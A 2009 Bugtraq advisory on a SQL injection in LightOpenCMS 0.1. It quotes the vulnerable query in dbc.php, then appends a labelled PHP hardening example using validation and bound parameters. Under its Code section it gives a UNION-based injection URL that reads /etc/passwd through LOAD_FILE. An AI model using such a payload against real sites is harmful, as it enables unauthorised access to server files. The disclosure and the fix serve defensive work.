LightOpenCMS 0.1 pre-alpha Remote SQL Injection


Date: Fri, 5 Jun 2009 15:38:17 +0200
Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <milw0rm@gmail.com.>

********   Salvatore "drosophila" Fresta   ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Remote SQL Injection


[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statements: the id request parameter is concatenated
into the query string without any escaping.

...

if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
            return mysql_fetch_assoc($result);

...


***************************************************

[+] Code


- [A] Remote SQL Injection


http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23


***************************************************

[+] Fix

No fix.


***************************************************

-- 
Salvatore Fresta aka drosophila
CWNP444351
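
Added example, not part of the original advisory and not LightOpenCMS code: one way to harden the lookup shown under [+] Bugs, using input validation plus a bound parameter. The function name get_page(), the assumption that page ids are positive integers, and the in-memory SQLite table (which requires the pdo_sqlite extension) are illustrative; a real deployment would pass its own MySQL PDO connection.

```php
<?php
// Added example: hardened replacement for the page lookup in dbc.php.
// get_page() is a hypothetical name; the assumption is that ids are positive integers.

function get_page(PDO $db, $rawId): ?array
{
    // Reject anything that is not a plain positive integer. filter_var() also
    // returns false for arrays (e.g. ?id[]=1), which isset() alone lets through.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Bound parameter: the value is sent separately from the SQL text, so a
    // quote in the input can no longer terminate the string literal.
    $stmt = $db->prepare('SELECT * FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample table so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO pages VALUES (1, 'Home', 'Welcome')");

// Constructed inputs: a valid id, a quote-bearing value, an array, a missing row.
$inputs = ['1', "-1' UNION ALL SELECT 1,2,3#", ['1'], '999'];

foreach ($inputs as $in) {
    $page = get_page($db, $in);
    printf(
        "%-40s => %s\n",
        json_encode($in),
        $page === null ? 'no page returned' : 'page "' . $page['title'] . '"'
    );
}
```

Only the first input returns a row; the quote-bearing and array values are rejected before any query is built, and the bound parameter remains as a second layer if the validation is ever relaxed.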
